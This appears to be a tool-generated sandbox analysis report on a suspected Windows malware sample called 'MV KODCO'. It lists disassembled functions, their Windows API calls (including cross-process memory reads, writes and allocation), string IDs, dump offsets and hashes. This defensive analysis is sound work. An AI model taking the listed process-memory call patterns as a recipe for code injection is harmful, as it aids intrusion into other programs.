                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: fc37eceab4d463d6ff27f35422c89f120a85427257d8adb2559cd725ac281a17
                                                          • Instruction ID: 063ee17352d5141e29e6946ac1a0add6a1520a288a5555db1b9351961bcb277a
                                                          • Opcode Fuzzy Hash: fc37eceab4d463d6ff27f35422c89f120a85427257d8adb2559cd725ac281a17
                                                          • Instruction Fuzzy Hash: 1BA177356047519FCB14DF15C48896ABBE6FF88310F048999F9969B3A2CB32EC45CF91
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 006032ED
                                                            • Part of subcall function 0060E0D0: __87except.LIBCMT ref: 0060E10B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: 03b61fd77c72a6383db236e5f2c83b75d6e60bfa968fe30f945ecbec2928c15d
                                                          • Instruction ID: 5b046a3e4a8f0318aa7ce2a972b115605eefb5a0a5c07c93d9cecdfe8a6ab89c
                                                          • Opcode Fuzzy Hash: 03b61fd77c72a6383db236e5f2c83b75d6e60bfa968fe30f945ecbec2928c15d
                                                          • Instruction Fuzzy Hash: 69516831A8822296CB1D7714C9413BB3BDFDB40711F248D68E4D6823E9DF368FD59A46
                                                          APIs
                                                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0067DC50,?,0000000F,0000000C,00000016,0067DC50,?), ref: 00624645
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 006246C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper$__itow__swprintf
                                                          • String ID: REMOVE$THIS
                                                          • API String ID: 3797816924-776492005
                                                          • Opcode ID: 0a951a7e5045acbaa7028d0f88c41c3c557fa29f6764bfae01aa14fe91939290
                                                          • Instruction ID: 157149d3b2ec29fe2b951f7f6a737c61da05b883f7d1dd261f1197367ff44a58
                                                          • Opcode Fuzzy Hash: 0a951a7e5045acbaa7028d0f88c41c3c557fa29f6764bfae01aa14fe91939290
                                                          • Instruction Fuzzy Hash: A441C330A0066A9FCF04DF65D885AAEBBB6FF49304F148059E956AB352DB34DC01CF50
                                                          APIs
                                                            • Part of subcall function 0062430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0061BC08,?,?,00000034,00000800,?,00000034), ref: 00624335
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0061C1D3
                                                            • Part of subcall function 006242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0061BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00624300
                                                            • Part of subcall function 0062422F: GetWindowThreadProcessId.USER32(?,?), ref: 0062425A
                                                            • Part of subcall function 0062422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0061BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0062426A
                                                            • Part of subcall function 0062422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0061BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00624280
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0061C240
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0061C28D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: dea1301ffd33da55cdc0a62c33cf0e0814f5312499ee3aa2c7747865419b293a
                                                          • Instruction ID: 9ac1948d6c1f9dbb5db1b01e218179ecedaf3bd67bf732082f9d0c35c376c741
                                                          • Opcode Fuzzy Hash: dea1301ffd33da55cdc0a62c33cf0e0814f5312499ee3aa2c7747865419b293a
                                                          • Instruction Fuzzy Hash: 1F413B72900228AFDB10DBA4DC81AEEB779AF09710F044099FA45B7181DA71AF85CF61
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0067DC00,00000000,?,?,?,?), ref: 0064A6D8
                                                          • GetWindowLongW.USER32 ref: 0064A6F5
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0064A705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 3ea9623d82d4332c2eca05b0fecf2e41714c418c8db3e61efea02685d78dbb7d
                                                          • Instruction ID: 0c65929b6e53394d14820fed73d583e7e5edfd252e56cb3cbb0e337b08444a25
                                                          • Opcode Fuzzy Hash: 3ea9623d82d4332c2eca05b0fecf2e41714c418c8db3e61efea02685d78dbb7d
                                                          • Instruction Fuzzy Hash: F331ED3124020AABDB218F78CC44BEA7BAAFB49324F254718F975922E0C770AC518B50
                                                          APIs
                                                          • _memset.LIBCMT ref: 00635190
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006351C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |$Dc
                                                          • API String ID: 1413715105-1210383203
                                                          • Opcode ID: c7511c297404180186f7bdb7bf99ed7e2975ce8f4081d1b5cf3df68a369fbd0f
                                                          • Instruction ID: 16f433c0891fb99908b37cba1b276484e9b7b13519f422b538da445702e0851a
                                                          • Opcode Fuzzy Hash: c7511c297404180186f7bdb7bf99ed7e2975ce8f4081d1b5cf3df68a369fbd0f
                                                          • Instruction Fuzzy Hash: 7C314A75C00119ABCF05EFA5CC85EEE7FB9FF58700F000059F945A6166DB31AA06DBA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0064A15E
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0064A172
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0064A196
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 5310fab5540488e04f9114f4ab085c2ddd67a85f903f8741b570e0da78505502
                                                          • Instruction ID: a14498a88b5d12e9799ef3072f5961e0f75b42d14b0ed6d0640e6631deb6160c
                                                          • Opcode Fuzzy Hash: 5310fab5540488e04f9114f4ab085c2ddd67a85f903f8741b570e0da78505502
                                                          • Instruction Fuzzy Hash: A121A132550218BBDF119FA4CC42FEA3B7AFF48754F110214FA55AB1D0D6B5AC55CBA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0064A941
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0064A94F
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0064A956
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: da58c839c277206e48ffe2b7566885af34e11f3d6b262f3b18f55822ccd1d8f6
                                                          • Instruction ID: 928d90bade2b5d9fb63ffa064d0f8ad194407af7dfdd0f018ef8d0d2eb1e8956
                                                          • Opcode Fuzzy Hash: da58c839c277206e48ffe2b7566885af34e11f3d6b262f3b18f55822ccd1d8f6
                                                          • Instruction Fuzzy Hash: 8E215EB5650209BFDB10DF68CC91DA737AEEB5A3A8F050059FA049B3A1CA71EC11CA61
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00649A30
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00649A40
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00649A65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 72f6d9982639653da19e3141ab7f81d2f6547f20cec253559dc6d184d7432e73
                                                          • Instruction ID: 30d6abab51319a2163676a431685b923a9dc7e3824681b8eecbfa82f2e9c699f
                                                          • Opcode Fuzzy Hash: 72f6d9982639653da19e3141ab7f81d2f6547f20cec253559dc6d184d7432e73
                                                          • Instruction Fuzzy Hash: 06218332650118BFDF118F54CC85EFB3BABEB89760F018129F9549B290C6719C5287A0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0064A46D
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0064A482
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0064A48F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 23391424275669e18c0eebeb3ab32263297f4fd2b67d195a90bcd56cb632ce83
                                                          • Instruction ID: 6c7de08e4dbca42be4cb5d43e3c744d353f61cddbe979527c00661fe663144e5
                                                          • Opcode Fuzzy Hash: 23391424275669e18c0eebeb3ab32263297f4fd2b67d195a90bcd56cb632ce83
                                                          • Instruction Fuzzy Hash: 9611E771240208BEEF205FB5CC49FEB3BAEFF89754F014128FA4596191D6B2E811CB24
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00602350,?), ref: 006022A1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 006022A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 2574300362-340411864
                                                          • Opcode ID: 5949a87b0a9d1a65ee5525758cd750c98d84f8d33a80344cfdb100a27ef2bebd
                                                          • Instruction ID: c0a67f763b01ec1599253827248c6aae6b46b11211235e46a86612747dd5f205
                                                          • Opcode Fuzzy Hash: 5949a87b0a9d1a65ee5525758cd750c98d84f8d33a80344cfdb100a27ef2bebd
                                                          • Instruction Fuzzy Hash: 4FE04F74B94301ABEB906FF1EC4DB9576ABBB0AB06F106020F102D51E0CBF45841DF05
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00602276), ref: 00602376
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0060237D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 2574300362-2819208100
                                                          • Opcode ID: f7bd5448d22e6527c824cb8b4aaff98a8a88397f2fa9e75d0b8ad6caa919556a
                                                          • Instruction ID: 8ab4b8a77114fade296cb34c9d311f74b2b5bb5cd959e10b141b0c009dca1171
                                                          • Opcode Fuzzy Hash: f7bd5448d22e6527c824cb8b4aaff98a8a88397f2fa9e75d0b8ad6caa919556a
                                                          • Instruction Fuzzy Hash: C3E0B6B0B84301ABEB246FA1ED1DB953AABBB0570AF112414F10AD21B0CBBA6810CF54
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 3eeca3ce8c1754ef15445dd3863a30eee68c37616fa9ed6791ecbca294905776
                                                          • Instruction ID: c55758c74a98fb6aefee47f90c03c64f307ef288cdd1b9ba9477c36f2d0922c6
                                                          • Opcode Fuzzy Hash: 3eeca3ce8c1754ef15445dd3863a30eee68c37616fa9ed6791ecbca294905776
                                                          • Instruction Fuzzy Hash: 51E0127180461CDBCB5097D0CD05DFA737FA704742F500592FD06A1000D6359B8AAA22
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,006421FB,?,006423EF), ref: 00642213
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00642225
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetProcessId$kernel32.dll
                                                          • API String ID: 2574300362-399901964
                                                          • Opcode ID: b025073bb1ec06137485e95afbee0036b6c9518fee118ca072644a065f3bc0ec
                                                          • Instruction ID: 62451608cf3ba3ccfcd8a729785d89c4afd9b340721cb9897ca1f250130484a8
                                                          • Opcode Fuzzy Hash: b025073bb1ec06137485e95afbee0036b6c9518fee118ca072644a065f3bc0ec
                                                          • Instruction Fuzzy Hash: 43D0A7B4910713AFCB214F71F818682B7DBEB0A300B115419F841E2650DBF0D880C660
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,005E42EC,?,005E42AA,?), ref: 005E4304
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E4316
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: d5967454c401b2ccf091d24c4f4e32dccf9abaeeefc202761d816232b4d9425c
                                                          • Instruction ID: 5dbf94f66c46a96a44e78333651ecbb198926162bad213b7024f33c12aa55c82
                                                          • Opcode Fuzzy Hash: d5967454c401b2ccf091d24c4f4e32dccf9abaeeefc202761d816232b4d9425c
                                                          • Instruction Fuzzy Hash: 79D0A774900713AFCB244F22E80C601BAD9BB09301B014819E481D2764E7F0C8C08A10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,005E41BB,005E4341,?,005E422F,?,005E41BB,?,?,?,?,005E39FE,?,00000001), ref: 005E4359
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E436B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: cf5579aba4c3368be6cd3ea53fda2d125f179eb6221571723017525da9927814
                                                          • Instruction ID: a0d19428ffd7969e97d4a7b63871bac640d63226e53a1b2bbebe5c931a8b8d0e
                                                          • Opcode Fuzzy Hash: cf5579aba4c3368be6cd3ea53fda2d125f179eb6221571723017525da9927814
                                                          • Instruction Fuzzy Hash: F1D0A771900723AFCB244F33E80C603BAD9BB15715B014919E4D1D2650E7F0D8C08A10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0062052F,?,006206D7), ref: 00620572
                                                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00620584
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                          • API String ID: 2574300362-1587604923
                                                          • Opcode ID: 663d43c4b2df6aecedd0ae7009143214530461854c90699b8c4657a06e0a7126
                                                          • Instruction ID: 58bcf7df91d93d3cdd2a58e415d866fa498ebf7602708d80837ce8e03f7226ce
                                                          • Opcode Fuzzy Hash: 663d43c4b2df6aecedd0ae7009143214530461854c90699b8c4657a06e0a7126
                                                          • Instruction Fuzzy Hash: 97D0A730950723AFDB205F31F808B42B7EEAF05300B11851DE845E2650D7F0C4C08E20
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,0062051D,?,006205FE), ref: 00620547
                                                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00620559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
